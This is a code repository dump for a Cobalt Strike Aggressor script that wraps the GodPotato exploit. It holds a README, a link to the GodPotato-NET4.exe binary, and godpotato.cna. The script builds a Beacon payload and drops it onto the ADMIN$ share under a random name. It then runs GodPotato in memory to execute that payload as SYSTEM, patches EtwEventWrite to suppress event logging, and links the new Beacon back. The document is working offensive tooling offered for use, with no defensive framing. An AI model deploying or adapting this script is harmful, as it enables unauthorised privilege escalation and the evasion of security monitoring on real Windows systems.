├── GodPotato-NET4.exe
├── README.md
└── godpotato.cna


/GodPotato-NET4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/weaselsec/GodPotato-Aggressor-Script/HEAD/GodPotato-NET4.exe


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GodPotato-Aggressor-Script
2 | 
3 | GodPotato is written by BeichenDream and can be found at https://github.com/BeichenDream/GodPotato. 
4 | 
5 | ![image](https://github.com/weaselsec/GodPotato-Agressor-Script/assets/147257425/5bf896a1-3d08-43fb-b86c-ced092572ba6)
6 | 
7 | 


--------------------------------------------------------------------------------
/godpotato.cna:
--------------------------------------------------------------------------------
 1 | #GodPotato can be found at https://github.com/BeichenDream/GodPotato
 2 | # $1 = bid, $2 = listener
 3 | alias godpotato {
 4 | 
 5 |    btask($1, "Tasked Beacon to escalate to SYSTEM");
 6 |    # we need a random file name.
 7 |    $name = rand(@("d612", "t5op", "5d2d")) . rand(100) . ".exe";
 8 | 
 9 |    # generate an EXE. $arch defined via &lambda when this function was registered with
10 |    $exedata = artifact_payload($2, "exe", "x64", "process", "Indirect");
11 | 
12 |    # upload the EXE to our target (directly)
13 |    bupload_raw!($1, "\\\\127.0.0.1\\ADMIN\$\\ $+ $name", $exedata);
14 | 
15 |    bexecute_assembly($1, script_resource("GodPotato-NET4.exe"), "-cmd \\\\127.0.0.1\\ADMIN\$\\ $+ $name $+ ","PATCHES:ntdll.dll,EtwEventWrite,0,C300");
16 |    # assume control of our payload (if it's an SMB or TCP Beacon)
17 |    beacon_link($1, $2, $3);
18 | }


--------------------------------------------------------------------------------